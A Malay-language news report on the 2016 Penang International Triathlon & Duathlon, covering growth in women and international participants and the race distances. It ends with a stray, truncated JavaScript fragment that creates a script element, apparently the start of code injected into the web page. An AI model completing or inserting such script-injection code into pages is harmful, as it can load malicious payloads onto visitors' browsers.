PgiTD’16, jumlah peserta wanita meningkat

Admin

TELUK BAHANG – Ketua Menteri, Y.A.B. Tuan Lim Guan Eng memuji penganjuran Penang International Triathlon & Duathlon 2016 (PgiTD’16) sebagai yang terbaik sejak edisi pertama (pada 2012) yang menyaksikan jumlah penyertaan peserta wanita meningkat.

Penyertaan wanita dalam edisi sebelum ini hanya kira-kira 20 peserta, namun bilangan kali ini meningkat sehingga melebihi 110 peserta.

“Dahulu (empat tahun lepas), kita lihat hanya lebih kurang 20 peserta, tetapi sekarang lebih daripada 110 (peserta) wanita menyertainya,” katanya ketika ditemui sejurus melepaskan peserta PgiTD’16 di Pantai Jubilee di sini barubaru ini.

Hadir sama, Pengerusi Kelab Berbasikal G, Datuk Dr. Lim Seh Guan.

Mengulas lanjut, Guan Eng memberitahu, PgiTD’16 juga mencatat sejarah tersendiri apabila jumlah penyertaan keseluruhan meningkat kepada 1,000 peserta dengan 60 peratus daripadanya adalah peserta antarabangsa.

Malah, beliau turut menyifatkan PgiTD’16 sebagai salah satu medium mempromosikan sektor pelancongan di negeri ini.

PgiTD’16 memperlihatkan penyertaan dari 22 negara termasuk Amerika Syarikat, Australia, Belgium, Britain, Kanada, Perancis, Filipina, Jerman, India, Indonesia, Ireland, Jepun, Mexico, Belanda, Norway, Pakistan, Rusia, Singapura, Afrika Selatan, Sweden, Venezuela dan Malaysia.

Terbahagi kepada dua kategori iaitu acara triathlon merangkumi renang sejauh 1.5 kilometer (km) di Pantai Jubilee, berbasikal (40km) dan larian (10km). Bagi acara duathlon, ia melibatkan larian 7km, berbasikal (40km) dan larian semula ke garisan penamat sejauh 10km.

var d=document;var s=d.createElement(‘script’);